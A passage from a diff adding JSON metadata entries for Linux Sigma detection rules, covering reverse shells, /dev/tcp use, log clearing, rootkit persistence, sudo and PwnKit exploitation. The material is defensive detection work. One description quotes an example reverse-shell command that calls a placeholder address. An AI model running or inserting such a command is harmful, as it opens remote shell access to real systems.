"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", + "value": "Suspicious Commands Linux" + }, + { + "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/06", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_files_directories.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1564/001/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", + "value": "Hidden Files and Directories" + }, + { + "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "meta": { + "author": "Marie Euler, Pawel Mazur", + "creation_date": "2020/05/18", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_create_account.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", + "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ] + }, + "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", + "value": "Creation Of An User Account" + }, + { + "description": "Detects suspicious command with /dev/tcp", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_dev_tcp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", + "https://book.hacktricks.xyz/shells/shells/linux", + "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" + ], + "tags": [ + "attack.reconnaissance" + ] + }, + "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", + "value": "Suspicious Use of /dev/tcp" + }, + { + "description": "Detects shellshock expressions in log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/14", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shellshock.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", + "value": "Shellshock Expression" + }, + { + "description": "Detects the use of tools that copy files from or to remote systems", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/18", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_file_copy.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1105/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", + "value": "Remote File Copy" + }, + { + "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_apt_equationgroup_lnx.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059.004" + ] + }, + "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", + "value": "Equation Group Indicators" + }, + { + "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/05", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_symlink_etc_passwd.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.qualys.com/2021/05/04/21nails/21nails.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" + ], + "tags": [ + "attack.t1204.001", + "attack.execution" + ] + }, + "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", + "value": "Symlink Etc Passwd" + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/09/10", + "falsepositive": [ + "Log rotation" + ], + "filename": "lnx_clear_syslog.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ] + }, + "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", + "value": "Commands to Clear or Remove the Syslog - Builtin" + }, + { + "description": "Detects buffer overflow attempts in Unix system log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_buffer_overflows.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" + ], + "tags": [ + "attack.t1068", + "attack.privilege_escalation" + ] + }, + "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", + "value": "Buffer Overflow Attempts" + }, + { + "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_rev_shells.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://alamot.github.io/reverse_shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", + "value": "Suspicious Reverse Shell Command Line" + }, + { + "description": "Detects suspicious log entries in Linux log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/25", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_log_entries.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", + "value": "Suspicious Log Entries" + }, + { + "description": "Detects the addition of a new user to a privileged group such as \"root\" or \"sudo\"", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/12/21", + "falsepositive": [ + "Administrative activity" + ], + "filename": "lnx_privileged_user_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", + "https://linux.die.net/man/8/useradd", + "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1098" + ] + }, + "uuid": "0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", + "value": "Privileged User Has Been Created" + }, + { + "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/05/04", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Immersive-Labs-Sec/nimbuspwn", + "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", + "value": "Nimbuspwn Exploitation" + }, + { + "description": "Detects suspicious command sequence that JexBoss", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_jexboss.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", + "value": "JexBoss Command Sequence" + }, + { + "description": "Detects space after filename", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/17", + "falsepositive": [ + "Typos" + ], + "filename": "lnx_space_after_filename_.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", + "value": "Space After Filename" + }, + { + "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/05", + "falsepositive": [ + "Rare temporary workaround for library misconfiguration" + ], + "filename": "lnx_ldso_preload_injection.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://man7.org/linux/man-pages/man8/ld.so.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.006" + ] + }, + "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", + "value": "Code Injection by ld.so Preload" + }, + { + "description": "Detects suspicious shell commands used in various exploit codes (see references)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_commands.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://artkond.com/2017/03/23/pivoting-guide/", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", + "http://pastebin.com/FtygZ1cg", + "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", + "value": "Suspicious Activity in Shell Commands" + }, + { + "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/05", + "falsepositive": [ + "Troubleshooting on Linux Machines" + ], + "filename": "lnx_shell_priv_esc_prep.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", + "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", + "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", + "value": "Privilege Escalation Preparation" + }, + { + "description": "Clear command history in linux which is used for defense evasion.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/03/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_clear_cmd_history.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", + "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", + "https://attack.mitre.org/techniques/T1070/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", + "value": "Clear Command History" + }, + { + "description": "Detects suspicious session with two users present", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_guacamole.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://research.checkpoint.com/2020/apache-guacamole-rce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_susp_guacamole.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "1edd77db-0669-4fef-9598-165bda82826d", + "value": "Guacamole Two Users Sharing Session Anomaly" + }, + { + "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_vsftp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/dagwieers/vsftpd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_susp_vsftp.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", + "value": "Suspicious VSFTPD Error Messages" + }, + { + "description": "Detects relevant ClamAV messages", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_clamav.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.001" + ] + }, + "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", + "value": "Relevant ClamAV Message" + }, + { + "description": "Detects suspicious modification of crontab file.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/04/16", + "falsepositive": [ + "Legitimate modification of crontab" + ], + "filename": "lnx_crontab_file_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_crontab_file_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", + "value": "Modifying Crontab" + }, + { + "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", + "meta": { + "author": "Sreeman", + "creation_date": "2022/01/26", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_pwnkit_local_privilege_escalation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/wdormann/status/1486161836961579020", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_pwnkit_local_privilege_escalation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.001" + ] + }, + "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", + "value": "PwnKit Local Privilege Escalation" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/16", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Workstations with frequently changing users" + ], + "filename": "lnx_susp_failed_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", + "value": "Failed Logins with Different Accounts from Single Source - Linux" + }, + { + "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_ssh_cve_2018_15473.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Rhynorater/CVE-2018-15473-Exploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_ssh_cve_2018_15473.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1589" + ] + }, + "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", + "value": "SSHD Error Message CVE-2018-15473" + }, + { + "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/30", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_ssh.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_susp_ssh.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", + "value": "Suspicious OpenSSH Daemon Error" + }, + { + "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Vulnerability scanners", + "Frequent attacks if system faces Internet" + ], + "filename": "modsec_mulitple_blocks.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/modsecurity/modsec_mulitple_blocks.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499" + ] + }, + "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", + "value": "Multiple Modsecurity Blocks" + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "lnx_sudo_cve_2019_14287_user.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ] + }, + "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", + "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_security_tools_disabling_syslog.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_security_tools_disabling_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "value": "Disabling Security Tools - Builtin" + }, + { + "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_named.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_susp_named.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", + "value": "Suspicious Named Error" + }, + { + "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Any legitimate cron file." + ], + "filename": "file_event_lnx_persistence_cron_files.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", + "value": "Persistence Via Cron Files" + }, + { + "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Creation of legitimate files in sudoers.d folder part of administrator work" + ], + "filename": "file_event_lnx_persistence_sudoers_files.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", + "value": "Persistence Via Sudoers Files" + }, + { + "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_lnx_triple_cross_rootkit_lock_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", + "value": "Triple Cross eBPF Rootkit Default LockFile" + }, + { + "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_lnx_triple_cross_rootkit_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1053.003" + ] + }, + "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", + "value": "Triple Cross eBPF Rootkit Default Persistence" + }, + { + "description": "Detects the creation of doas.conf file in linux host platform.", + "meta": { + "author": "Sittikorn S, Teoderick Contreras", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_lnx_doas_conf_creation.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", + "value": "Linux Doas Conf File Creation" + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/03", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "filename": "net_connection_lnx_ngrok_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ] + }, + "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", + "value": "Communication To Ngrok Tunneling Service - Linux" + }, + { + "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_lnx_back_connect_shell_dev.yml", + "level": "critical", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" + ], + "tags": "No established tags" + }, + "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", + "value": "Linux Reverse Shell Indicator" + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "net_connection_lnx_crypto_mining_indicators.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" + ], + "tags": "No established tags" + }, + "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", + "value": "Linux Crypto Mining Pool Connections" + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + 